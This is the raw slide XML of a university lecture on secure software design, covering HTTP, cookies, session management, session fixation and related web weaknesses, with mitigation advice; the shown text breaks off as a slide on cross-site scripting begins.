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0.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide66.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide39.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/_rels/notesSlide67.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notesSlides/notesSlide67.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide66.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2E7D-B9A4-4CFA-8009-34899E258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72B1-9F1C-4B47-8903-24990D3B14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BF40-AFFF-44EA-8F3F-0129C6385B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explosion clip art from: http://openclipart.org/detail/166696/nuclear-explosion-by-tzungha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EE84-1727-4827-9C07-25932790AD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explosion clip art from: http://openclipart.org/detail/166696/nuclear-explosion-by-tzungha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046A-DA96-4BD4-A217-55BCBF5879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ecurityevaluators.com/content/case-studies/caching/caching.pdf</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4690-86E1-4C36-AE36-B01426CC9A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AS Static Analysis Tool Study - Methodology (December 2011)” http://samate.nist.gov/docs/CAS_2011_SA_Tool_Method.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Sticking to the Facts II – Scientific Study of Static Analysis Tools”, SATE IV Workshop, March 29, 20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buildsecurityin.us-cert.gov/swa/presentations_032612/Sticking%20to%20the%20Facts%20Scientific%20%20Study%20of%20Static%20Analysis%20Tools%20-%20Kathleen%20Erno.pd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19A7-7693-4330-9870-42E78D3D16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0A4E-F990-49F6-9710-5E0C6C2219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1CC0-FAD9-4713-868D-2C4A0FD006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66B7B-B8FC-4EE3-A969-B77E0303B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8981C-4FB0-4F57-BBD5-8C8D3A03A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B89A6-1807-4538-BF92-1558C972D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0A4F8-539A-4D03-B45E-CA9F1F47B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85040-0E0F-49CC-8AEE-5C43155A0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6D418-03F8-4D7E-B45D-AC8A50AA9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B9603-CED8-4491-AEA0-DDE94B862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12E1B-4378-4562-A613-A7D032DCE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2E8D9-B5F8-4A53-A0BD-35845D1A8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D8086-8789-4EE4-9832-5E8F23920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3ED94-9578-46FE-908A-84B495D48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07503-0B60-4441-A8E5-BBAC777AA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4AFC-9A32-463A-BB8D-B25E3C75C7EC}"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9237-076E-4139-9B81-F68CC0987B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html5rocks.com/en/tutorials/security/content-security-policy/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/TR/CSP/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.twitter.com/2011/improving-browser-security-csp"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cve.mitre.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/"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first.org/cvss/cvss-guide.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/cvss.cfm?calculator&amp;version=2"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cwe.mitre.org/"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cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId1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cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId1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cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/top25/" TargetMode="Externa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s://www.securecoding.cert.org/confluence/display/seccode/BB.+Definitions#BB.Definitions-vulnerability" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/seccode/MSC00-C.+Compile+cleanly+at+high+warning+levels" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/display/cplusplus/VOID+Compile+cleanly+at+high+warning+levels" TargetMode="External"/><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s://www.securecoding.cert.org/confluence/display/seccode/STR02-C.+Sanitize+data+passed+to+complex+subsystems"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04760"/>
            <a:ext cx="7772400" cy="16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WE 681 / ISA 681</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure Software Design &amp; Programming:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Lecture 6: Output, web applications, &amp; top weakness lists/taxonomie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David A. Wheele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5-08-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TP</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 - HyperText Transfer Protocol</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mple request/response protoco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b client sends requests, web server respon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uns on top of TCP/IP protocol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asic  protocol:</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ent (e.g., user’s web browser) sends HTTP request to HTTP server port (typically port 8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TTP server receives request &amp; performs some action per request &amp; privileg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TTP server sends back request file (if ok) and status/error message</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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9B60-27D9-4086-A297-AD2A6F6C33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HTTP/1.1 request methods (per spec)</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TIONS: Get info on comm op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T: Retrieve inform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AD: Like GET, but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>just</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> get meta-inform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ST: Post (form) dat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UT: Store (replacement) dat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LETE: Delete the resourc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CE: Show client what recipient reciev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NECT: Reserved for future use</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>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ically have message headers, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>field-name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>: [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>value</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9D93B-C241-4A11-8D6A-0DB9F9F394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TP Safe Methods</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(per HTTP/1.1 specification)</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ET and HEAD methods SHOULD NOT have the significance of taking any action other than retriev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buy/sell anything, change status, etc.</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r agents can represent other methods (e.g., POST, PUT and DELETE) differently, denote “possibly unsaf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GET = Click on link, POST = “Submit” butt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ortant hint to user – helps prevent fooling user</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tocol can’t enforce, but if GET or HEAD used, “user did not request the side-effects, so therefore cannot be held accountable for them”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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AC5D-D80E-4873-8B1F-E1AB06D4A6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TP Idempotent Methods</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(per HTTP/1.1 specification)</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Idempotence” = aside from error or expiration issues, side-effects of &gt; 1 identical requests same as 1 reques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ethods GET, HEAD, PUT and DELETE idempotent</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POST!</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ethods  OPTIONS and TRACE also idempotent</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they SHOULD NOT have side effects at all</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ware: a sequence of several requests can be non-idempotent, even if all of its methods are idempotent</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a sequence is non-idempotent if its result depends on a value that is later modified in the same sequence</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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281F-EE86-45E8-BAB9-1329CD9260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vial GET request</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(from client to server)</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T /index.html HTTP/1.1</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 www.dwheeler.com</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Language: e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nection: keep-aliv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r: https://www.dwheeler.com/misc.html</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Blank line to end the request</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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B403-6ADA-426F-BA5F-04FCEA43EA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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="4724280"/>
            <a:ext cx="7925040" cy="19227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 is a simple text-based protocol; every line ends with CRLF (officially) and a blank line ends the requ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nd this manually u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telnet www.dwheeler.com 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TP Responses</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line is “Status l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col version, 3-digit numeric status code, &amp; associated textual phra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xx: Success - The action was successfully received,  understood, and accepted. 200=O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4xx: Client Error - The request contains bad syntax or cannot be fulfilled.  404=not found, 401=unauthorize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ed by rest of response</a:t>
            </a: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FEA7-2832-466F-99C6-8C097E5CEB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vial GET reply</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1.1 200 OK</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e: Mon, 01 Oct 2012 21:41:47 GM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er:</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st-Modified: Sun, 02 Sep 2012 18:49:14 GM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Tag: "67622cb-9d4f-7b3f5e80"</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ept-Ranges: byte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nt-Length: 40271</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nt-Type: text/html</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Blank line precedes reply data</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t;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&g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t;html lang="en-US"&g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t;head&g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5CBA-99B8-4471-998E-31D2079D39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TP Response Splitting</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 replies (like the previous one) can include many f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very careful about data sent back in fiel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pecially newline &amp; return! Attacker can create new fields/responses if can insert the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control characters &amp; “:” concern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telist, not blacklist – limit to alphanum if ca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to limit input also (if you can)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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986F-B6E7-47F7-AE37-39E0A3E6B0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vial POST Request</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ST /myform.html HTTP/1.1</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st: www.example.com</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okie: myId=dwheele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ferer: http://www.example.com/index.html</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ent-Type: application/-x-www-form-urlencoded</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ent-Length: 325</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nection: keep-alive</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Blank line to end the header, encoded data follows</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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6366-031E-4FCC-B3EC-5B5E0A6CDE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T: Parameters sent as part of query string</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GET” can send information, via query string parameter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ten sent to other sites by HTTP referer head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ten stored in browser hist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ten written to log file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ST sends parameters separately (bod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POST wh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ing some action that shouldn’t be auto-repeat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 is sensitiv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uthentication requir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se cases </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>forbid</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> GET, don’t allow as alternative</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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52BE-24B2-4121-9048-463F58F4A0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ding output ba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 applica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ing related vulner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on vulnerability lists</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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2B39-ED6F-4C44-BCC2-64CBFBC1B0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TTP Cookies: Basics</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er may reply with fields to set cookies:</a:t>
            </a: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Cookie: name=value</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Cookie: name2=value2; Expires=Wed, 09-Jun-2021 10:18:14 GMT</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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n on, browser includes cookie values as part of requests to that domain:</a:t>
            </a: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ookie: name=value; name2=value2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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no expiration time set, cookie expires when browser ex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expiration time set, browser is supposed to store cookie persistently (user may erase)</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892B-504B-4A12-8D38-13DAAEA84A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kie attribute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yond name/value pair, cookie attribut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okie domain: Server domain when cookie will be sent (default: this domain, limits on alternat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th: Path when cookie will be sent (default: this path)</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iration time or maximum age (second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ure flag: Only transmit on encrypted channel</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ttpOnly flag: Only HTTP/HTTPS (not javascrip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rowsers will not send cookie attributes back to the server (just name/value pair)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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10492-684E-4EB5-A52D-5C43F69F24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Management</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TTP is stateles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y itself, a server doesn’t know of any relationship between “this” request (or user) &amp; previous reques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fect for “please send me this static fi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adequate for interactive applications, shopping carts, et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many applications, need to identify &amp; manage session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by passing a “session identifie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r logs in, gets session id, all logged-in requests have that i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exchanged in a cookie (secure, HttpOnl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ood session identifiers are not guessab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ssion management, properly implemented,  can prevent session hijacking and cross-site request forgery (CSRF) attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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A3FA-AFEB-4B9A-8D32-6B055B150B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Management: Reuse Code</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st to use existing application container/ library for HTTP session management</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 up session ids, etc.</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t check that it’s secure (may need to configure):</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ssion identifier should have at least 128 bits of random data (else too easily guess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st use cryptographically secure pseudo-random number generator (PRNG) to generate identifier – not “add one” or roll-your-ow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rypt session ids over untrusted channels</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you don’t, many can see session id, enables session forging</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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DB68-7285-454C-807F-FE32C2B1BA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ways create new session when user authenticat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en if user has an existing session, always create a new session when user authenticate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gnore old session</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iling to do so permits “session fixation” attack</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tacker creates a new session, tricks user into using that session to authenticate agains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rver sees user has a session ID &amp; reuses i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tacker may now be able to use session ID (that they created) to gain control with victim’s privileges</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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330B2-B225-4B4D-A1FF-58518DFBBF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fixation attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4846320"/>
            <a:ext cx="8229600" cy="14778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session fixation attack, attacker exploits server that fails to reassign session ids on login</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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24CA-39EC-454B-AB1E-E94E61CD20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Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909880" y="182880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Server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649440" y="3352680"/>
            <a:ext cx="236196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lo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icious user)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5302080" y="335268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ic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browser</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="126" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="124" idx="0"/>
            <a:endCxn id="123" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1829880" y="2323800"/>
            <a:ext cx="1080360" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="1832040"/>
            <a:ext cx="281952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lory logs in &amp; gets session_id = 111</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="128" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="125" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5333760" y="2323800"/>
            <a:ext cx="1149840" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410080" y="2320920"/>
            <a:ext cx="37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ice clicks, browser goes to site &amp; auto-provides session_id=111, username, and password</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Picture 17" descr="nuclear explosion by tzunghaor - "/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7120080" y="3521160"/>
            <a:ext cx="533160" cy="641160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="131" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="124" idx="3"/>
            <a:endCxn id="125" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3011040" y="3847680"/>
            <a:ext cx="2291400" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3081240" y="3552840"/>
            <a:ext cx="201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lick here to see dancing pi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ession_id=111</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334120" y="1239840"/>
            <a:ext cx="361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erver sees session_id &amp; just reuses it, &amp; reassociates that session_id to Alice</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93600" y="2428920"/>
            <a:ext cx="333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allory re-accesses with session_id, which now has Alice’s permi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s: Limit Time</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(Idle time &amp; session time)</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t maximum session idle time and maximum session time to reduce risk &amp; damag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user doesn’t log out, only short exposure tim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wer valid session ids for attacker to gue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 if attacker gets session id, limits time it’s valid</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g., an application container that implements Java Servlet: configure web.xml to set session idle timeout:</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lt;session-config&gt; &lt;!—timeout, in minutes --&gt;</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lt;session-timeout&gt;60&lt;/session-timeout&gt;</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lt;/session-config&g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91F3-362B-44FD-87BB-E8024A1BBE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time: Limit maximum time</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y have to implement session timeouts yourself</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>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ava servlets: Chess book describes how to use doFilter() to do this</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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ore current time for session first time request is made for that session</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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session still in use after maximum lifetime, invalidate session</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>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sure to provide a “logout” function for users</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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users can make the time even shorter!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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E02B-15AC-4EC6-8F0F-08CCA03338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s: Ensure that</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>logging off disables cookie</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rs expect that after “log off” they must “log in” to reconnec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ensure this, log off must disable server-side session cookies to prevent its reus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wise, the cookie could continue ses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ssion cookies can be captured, e.g., by malware, XSS (to be discussed), or by stealing your phon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systems don’t disable cookies on log off</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lures include: Office 365, Yahoo mail, Wordpre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disable: Gmail, Tweetdeck, Facebook</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of 2013-07-13</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285840"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re info: http://samsclass.info/123/proj10/cookie-reuse.htm</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="16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5FD2-9FD8-4055-8B6C-19D3470D22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ss-Site Scripting (XSS) /</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
